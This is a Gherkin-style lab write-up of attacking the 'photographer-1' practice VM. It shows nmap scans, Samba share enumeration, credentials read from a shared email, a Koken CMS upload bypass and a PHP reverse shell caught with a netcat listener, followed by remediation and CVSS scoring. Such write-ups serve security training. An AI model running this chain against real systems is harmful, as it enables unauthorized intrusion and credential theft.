## Version 1.4.1
## language: en

Feature:
  TOE:
    photographer-1
  Category:
    Arbitrary File Upload
  Location:
    http://192.168.1.66:8000/admin/
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.342: https://fluidattacks.com/web/rules/342/
  Goal:
    Bypass the file upload on Koken CMS and get shell
  Recommendation:
    Using a file type detector

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | Burp Suite        |  2020.6    |
    | Metasploit        |  5.0.99    |
    | Enum4all          |  0.8.9     |
    | Smbclient         |  4.12.5    |
    | Netcat            |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 13:36 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.017s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.076s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.017s latency).
    Nmap scan report for 192.168.1.66
    Host is up (0.012s latency).
    Nmap scan report for 192.168.1.67
    Host is up (0.0041s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0042s latency).
    Nmap done: 256 IP addresses (6 hosts up) scanned in 5.77 seconds
    """
    And I determined that the ip of the machine is 192.168.1.66
    And and it has the ports 80, 139, 445 and 8000 open
    """
    $ nmap -sV 192.168.1.66
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 13:41 -05
    Nmap scan report for 192.168.1.66
    Host is up (0.00060s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE     VERSION
    80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
    Service Info: Host: PHOTOGRAPHER

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
    """

  Scenario: Normal use case
    Given I access http://192.168.1.66/
    And I see a simple website [evidences](simple.png)
    Then I access the site at http://192.168.1.66:8000/
    And I noticed another page with only a content called "shell.php"

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I see 2 suspicious ports: 139 and 145 (Samba service)
    Then I decide to scan those ports for vulnerabilities with nmap
    """
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 14:01 -05
    Nmap scan report for 192.168.1.66
    Host is up (0.00080s latency).

    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)
    445/tcp open  microsoft-ds
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false
    | smb-vuln-regsvc-dos:
    |   VULNERABLE:
    |   Service regsvc in Microsoft Windows systems vulnerable
    |     State: VULNERABLE
    |       The service regsvc in Microsoft Windows 2000 systems is vulnerable
    |       pointer. This script will crash the service if it is vulnerable.
    |       while working on smb-enum-sessions.
    |_

    Nmap done: 1 IP address (1 host up) scanned in 39.30 seconds
    """
    Then I keep investigating, looking for better attacks
    And I check the exact version of Samba to search exploits for that version
    Then I used Metasploit framework for that [evidences](samba.png)
    And specifically I used the auxiliary "auxiliary/scanner/smb/smb_version"
    """
    msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.66
    RHOSTS => 192.168.1.66
    msf5 auxiliary(scanner/smb/smb_version) > run

    [*] 192.168.1.66:445      - Host could not be ...: (Samba 4.3.11-Ubuntu)
    [*] 192.168.1.66:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    """
    And I was able to determine the exact version of the system
    Then following with the research I did not get a working exploit
    Then reading a little more about Samba I found a tool called "enum4linux"
    And which was very useful to enumerating data from Samba hosts
    Then analyzing the target I look at its shared resources
    """
    $ enum4linux 192.168.1.66
    ...
    ...
    [+] Attempting to map shares on 192.168.1.66
    //192.168.1.66/print$   Mapping: DENIED, Listing: N/A
    //192.168.1.66/sambashare       Mapping: OK, Listing: OK
    //192.168.1.66/IPC$     [E] Can't understand response:
    NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
    """
    Then using the smbclient tool
    And because I know 2 system users [evidences](users.png)
    Then I can connect with the service without any password
    """
    $ smbclient //192.168.1.66/sambashare -U agi
    Enter WORKGROUP\agi's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Mon Jul 20 20:30:07 2020
      ..                                  D        0  Tue Jul 21 04:44:25 2020
      mailsent.txt                        N      503  Mon Jul 20 20:29:40 2020
      wordpress.bkp.zip                   N 13930308  Mon Jul 20 20:22:23 2020

                    278627392 blocks of size 1024. 264268400 blocks available
    smb: \>
    """
    Then reading the mailsent.txt file I was able determine two key things
    And which were the email "daisa@photographer.com" and password "babygirl"
    """
    Message-ID: <4129F3CA.2020509@dc.edu>
    Date: Mon, 20 Jul 2020 11:40:36 -0400
    From: Agi Clarence <agi@photographer.com>
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1)
    X-Accept-Language: en-us, en
    MIME-Version: 1.0
    To: Daisa Ahomi <daisa@photographer.com>
    Subject: To Do - Daisa Website's
    Content-Type: text/plain; charset=us-ascii; format=flowed
    Content-Transfer-Encoding: 7bit

    Hi Daisa!
    Your site is ready now.
    Don't forget your secret, my babygirl ;)
    """
    Then I found an administration panel with the simple url /admin/
    And with the credentials obtained
    Then I was able to log in correctly [evidences](login.png)(admin.png)

  Scenario: Exploitation
    Given I have access to the administration panel
    And I noticed that the title is called Koken (a CMS)
    Then I do a little search of vulns in that CMS [evidences](exploitdb.png)
    And I found the following:
    """
    https://www.exploit-db.com/exploits/48706
    """
    Then it is a method to bypass the upload file of said CMS
    And curiously the method is by the same author of the vbd
    Then I did the same as the PoC, I used burpsuite to alter the requests
    And bypass the upload file [evidences](burpsuite.png)(shell.png)
    Then I just send a reverse shell in php and connected it with netcat
    """
    $ nc -lnvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.67] from (UNKNOWN) [192.168.1.66] 38414
    Linux photographer 4.15.0-112-generic #113~16.04.1-Ubuntu SMP
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    """

  Scenario: Remediation
    Update Koken CMS to the latest version provided by the vendor

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environment
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date {2020-19-08}
